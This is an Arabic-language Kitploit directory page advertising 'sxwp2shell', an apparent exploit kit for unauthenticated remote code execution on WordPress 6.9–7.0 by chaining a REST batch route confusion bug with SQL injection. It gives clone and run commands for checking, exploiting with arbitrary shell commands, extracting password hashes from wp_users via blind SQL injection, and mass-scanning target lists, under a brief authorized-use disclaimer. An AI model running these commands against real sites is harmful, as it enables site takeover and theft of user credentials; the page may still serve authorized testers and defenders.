Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
sxwp2shell — عدة استغلال RCE قبل المصادقة في WordPress wp2shell (CVE-2026-63030 + CVE-2026-60137) | Kitploit
أدوات/GitHubGitHub/sentinelxofficial/sxwp2shell
أطر اختبار الاختراقماسحات الثغرات الأمنيةتحليل الكودالاستغلالأمن الويب
GitHubsentinelxofficial/sxwp2shell

sxwp2shell

عدة استغلال RCE قبل المصادقة في WordPress wp2shell (CVE-2026-63030 + CVE-2026-60137)

عرض المستودع
1منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
root@kitploit:~
  / ___/___  ____  / /_(_)___  ___  / / | |/ /
  \__ \/ _ \/ __ \/ __/ / __ \/ _ \/ /  |   /
 ___/ /  __/ / / / /_/ / / / /  __/ /___/   |
/____/\___/_/ /_/\__/_/_/ /_/\___/_____/_/|_|

sxwp2shell — استغلال RCE قبل المصادقة في ووردبريس عبر الخلط بين مسارات REST API بالدفعات (CVE-2026-63030) + حقن SQL (CVE-2026-60137).

الإصدارات المتأثرة: WP 6.9.0–6.9.4 / 7.0.0–7.0.1


التثبيت

root@kitploit:~
git clone https://github.com/SentinelXofficial/sxwp2shell
cd sxwp2shell
chmod +x sxwp2shell.py

Python 3.7+، المكتبة القياسية فقط — لا حاجة لتثبيت pip.

الاستخدام

الأمرالوظيفة
check <url>كشف الإصدار، ونقطة نهاية الدفعة، والخلط في المسارات وSQLi
exploit <url>سلسلة RCE كاملة (SQLi ← إنشاء مسؤول ← شل)
read <url>استخراج بيانات SQLi العمياء
scan <file>فحص جماعي للأهداف من ملف، مع تصدير CSV
root@kitploit:~
python3 sxwp2shell.py check https://target.com
python3 sxwp2shell.py exploit https://target.com --cmd id
python3 sxwp2shell.py read https://target.com --query "SELECT user_pass FROM wp_users"
python3 sxwp2shell.py scan targets.txt -o results.csv

الخيارات

root@kitploit:~
--cmd CMD         الأمر المراد تنفيذه          (الافتراضي: id)
--query QUERY     استعلام SQL مخصص
-k, --insecure    تخطي التحقق من SSL
--proxy PROXY     وكيل HTTP
--timeout SEC     مهلة الطلب              (الافتراضي: 15)
--delay SEC       التأخير بين الطلبات
--agent AGENT     وكيل مستخدم مخصص
--no-color        تعطيل المخرجات الملونة
-o, --output      حفظ نتائج الفحص في CSV

إخلاء المسؤولية

للاستخدام في الاختبارات الأمنية المصرح بها فقط. اقرأ DISCLAIMER.md.

تنزيل الأداة